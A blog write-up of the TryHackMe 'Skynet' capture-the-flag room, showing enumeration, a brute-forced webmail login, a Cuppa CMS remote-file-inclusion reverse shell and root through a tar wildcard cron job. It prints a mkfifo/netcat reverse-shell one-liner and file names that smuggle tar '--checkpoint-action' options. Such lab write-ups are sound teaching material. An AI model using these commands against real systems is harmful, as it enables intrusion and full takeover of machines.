29 January 2021 / TRYHACKME, CTF, EASY Skynet Write Up Overview Skynet is a easy rated CTF room on TryHackMe. Are you able to compromise this Terminator themed machine? Nmap I deployed the machine and was given the target IP 10.10.120.207. I started a NMAP scan to check the available ports. └──╼ $sudo nmap -sC -sV -oN nmap/initial 10.10.120.207 Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 16:37 GMT Nmap scan report for 10.10.120.207 Host is up (0.032s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA) | 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA) |_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Skynet 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: AUTH-RESP-CODE CAPA PIPELINING RESP-CODES UIDL SASL TOP 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: Pre-login IMAP4rev1 ENABLE LOGINDISABLEDA0001 more LOGIN-REFERRALS have SASL-IR listed ID capabilities LITERAL+ post-login IDLE OK 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h59m59s, deviation: 3h27m50s, median: 0s |_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: skynet | NetBIOS computer name: SKYNET\x00 | Domain name: \x00 | FQDN: skynet |_ System time: 2021-01-24T10:37:29-06:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-01-24T16:37:29 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.79 seconds 6 Ports open: 22 - SSH - Banner is showing its an Ubuntu machine 80 - HTTP - Apache web server version 2.4.18 110 - POP3 - Dovecot 139/445 - Samba 143 - IMAP - Dovecot Enumeration A few ports to review but I started with SMB because typically in CTF’s you can find anonymous access to share which provide hints or files required on other ports. Using smbmap I found one accessible share called anonymous. └──╼ $smbmap -H 10.10.120.207 [+] Guest session IP: 10.10.120.207:445 Name: 10.10.120.207 Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers anonymous READ ONLY Skynet Anonymous Share milesdyson NO ACCESS Miles Dyson Personal Share IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu)) Using smbclient I was able to connect to the share and found a text file and a folder of logs files. I downloaded all the files to my machine. └──╼ $smbclient //10.10.120.207/anonymous Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Nov 26 16:04:00 2020 .. D 0 Tue Sep 17 08:20:17 2019 attention.txt N 163 Wed Sep 18 04:04:59 2019 logs D 0 Wed Sep 18 05:42:16 2019 9204224 blocks of size 1024. 5822640 blocks available smb: \> get attention.txt getting file \attention.txt of size 163 as attention.txt (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec) smb: \> cd logs smb: \logs\> ls . D 0 Wed Sep 18 05:42:16 2019 .. D 0 Thu Nov 26 16:04:00 2020 log2.txt N 0 Wed Sep 18 05:42:13 2019 log1.txt N 471 Wed Sep 18 05:41:59 2019 log3.txt N 0 Wed Sep 18 05:42:16 2019 9204224 blocks of size 1024. 5819896 blocks available smb: \logs\> mget * Get file log2.txt? y getting file \logs\log2.txt of size 0 as log2.txt (0.0 KiloBytes/sec) (average 0.7 KiloBytes/sec) Get file log1.txt? y getting file \logs\log1.txt of size 471 as log1.txt (4.1 KiloBytes/sec) (average 1.8 KiloBytes/sec) Get file log3.txt? y getting file \logs\log3.txt of size 0 as log3.txt (0.0 KiloBytes/sec) (average 1.4 KiloBytes/sec) smb: \logs\> The attention.txt file is a note: “A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson” However log1.txt looks to be a password list. log2 and log3 are empty. I moved on to start enumerating the website. Nothing to note on the page or in the page source so I ran a gobuster. ┌─[daz@parrot]─[~/Documents/TryHackMe/Skynet] └──╼ $gobuster dir -u http://10.10.120.207 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.120.207 [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/01/24 16:38:47 Starting gobuster =============================================================== /admin (Status: 301) /css (Status: 301) /js (Status: 301) /config (Status: 301) /ai (Status: 301) /squirrelmail (Status: 301) /server-status (Status: 403) =============================================================== 2021/01/24 16:41:06 Finished =============================================================== /squirrelmail brings to me to a login page. Using Burp intruder I was able to find the login details for Miles. I created a username file with the following entries: miles mdyson milesdyson milesd Using this list of usernames and the passwords found in log1.txt I was able to access the email account. One of the emails is miles new SMB password. “We have changed your smb password after system malfunction. Password: )s{A&2Z{REDACTED}” Going back to smbclient I tried to connect to the SMB share milesdyson with the new password and got in. └──╼ $smbclient //10.10.120.207/milesdyson -U milesdyson -p Enter WORKGROUP\milesdyson's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue Sep 17 10:05:47 2019 .. D 0 Wed Sep 18 04:51:03 2019 Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 10:05:14 2019 Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 10:05:14 2019 Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 10:05:14 2019 notes D 0 Tue Sep 17 10:18:40 2019 Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 10:05:14 2019 Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 10:05:14 2019 9204224 blocks of size 1024. 5810144 blocks available Only really one file of interest /notes/important.txt └──╼ $cat important.txt 1. Add features to beta CMS /45kra2{REDACTED} 2. Work on T-800 Model 101 blueprints 3. Spend more time with my wife A new cms directory to probe, looking at the page it appears to be a blog page for Miles. Running gobuster again against the directory reveals a administrator page. └──╼ $gobuster dir -u http://10.10.120.207/45kra2{REDACTED}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.120.207/45kra2{REDACTED}/ [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/01/24 16:48:27 Starting gobuster =============================================================== /administrator (Status: 301) =============================================================== 2021/01/24 16:50:42 Finished =============================================================== Initial Access Going to http://10.10.120.207/45kra2{REDACTED}/administrator/ takes us to a login page for Cuppa CMS. A quick Google reveals the exploit which provides and local and remote file inclusion. Looking at the exploit we can simply request a URL with our shell code location. We can use this to get a reverse shell payload from our machine and then execute. http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt? On my machine I copied /usr/share/webshells/php/php-reverse-shell.php to my working directory and renamed it to shell.php, I updated the configuration to include my VPN IP and port 4444. Then using python3 I started a http server to host the reverse shell payload and started a netcat listener on port 4444. In my browser I entered: http://10.10.120.207/45kra2{REDACTED}/administrator/alerts/alertConfigField.php?urlConfig=http:///shell.php └──╼ $sudo python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.120.207 - - [24/Jan/2021 16:57:15] "GET /shell.php HTTP/1.0" 200 - On my netcat listener I get a response and got a shell as ‘www-data’. └──╼ $nc -nvlp 4444 listening on [any] 4444 ... connect to [] from (UNKNOWN) [10.10.120.207] 59292 Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 10:57:15 up 22 min, 0 users, load average: 0.00, 0.04, 0.06 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ Priv Esc Looking at the file system there are two files backup.sh and backup.tgz both owned by root. drwxr-xr-x 2 root root 4.0K Sep 17 2019 . drwxr-xr-x 5 milesdyson milesdyson 4.0K Sep 17 2019 .. -rwxr-xr-x 1 root root 74 Sep 17 2019 backup.sh -rw-r--r-- 1 root root 4.5M Jan 24 10:59 backup.tgz The script is really simple, just creating a backup tar file or /var/www/html. $ cat backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * However because the tar command is using * which is a wild card and it appears the script is being run by root as a cron job we can exploit this to get a reverse shell. This article explains it in detail. I following the same steps in the article and set my port to 5555 as already have a shell on port 4444. echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5555 >/tmp/f" > shell.sh echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > "--checkpoint=1" Now just wait for a minute and we now have a root shell! Thanks for reading! ============================================================ Any comments or feedback welcome! You can find me on twitter.